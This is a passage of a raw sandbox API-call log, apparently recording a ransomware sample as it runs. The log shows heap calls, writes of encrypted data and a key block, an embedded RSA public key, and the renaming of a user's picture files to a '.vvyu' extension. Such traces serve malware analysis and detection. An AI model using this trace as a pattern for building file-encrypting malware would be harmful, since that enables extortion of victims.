Size=0x4) returned 0x2c78a30 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.849] GetCurrentThreadId () returned 0x66c [0201.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8ce8 [0201.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.850] GetCurrentThreadId () returned 0x66c [0201.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0201.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3560 [0201.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35c0 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35d8 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3578 [0201.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3548 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90038 | out: hHeap=0x620000) returned 1 [0201.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.864] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x5102, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x5102, lpOverlapped=0x0) returned 1 [0201.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.865] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x5107, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.865] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.867] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.867] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.867] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.867] CloseHandle (hObject=0x510) returned 1 [0201.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0201.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0201.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0201.869] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\irzPaaYV6FB7p4.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\irzpaayv6fb7p4.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\irzPaaYV6FB7p4.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\irzpaayv6fb7p4.gif.vvyu")) returned 1 [0201.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.871] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0201.874] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5565dc40, ftCreationTime.dwHighDateTime=0x1d8a189, ftLastAccessTime.dwLowDateTime=0x2343e650, ftLastAccessTime.dwHighDateTime=0x1d8a277, ftLastWriteTime.dwLowDateTime=0x2343e650, ftLastWriteTime.dwHighDateTime=0x1d8a277, nFileSizeHigh=0x0, nFileSizeLow=0x3fc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tNBhPX6T.bmp", cAlternateFileName="")) returned 1 [0201.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0201.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.875] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\tNBhPX6T.bmp") returned=".bmp" [0201.875] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\tNBhPX6T.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\tnbhpx6t.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.876] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=16325) returned 1 [0201.876] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.879] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x3f9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.879] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.884] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.884] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x3fc5, lpOverlapped=0x0) returned 1 [0201.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.886] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.887] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.887] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.887] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.887] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.887] GetLastError () returned 0x0 [0201.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.887] GetLastError () returned 0x0 [0201.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.888] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.888] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.889] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.889] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.889] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3fd0) returned 0x2ea99b0 [0201.889] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90038 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90080 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0201.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.890] RtlAllocateHeap 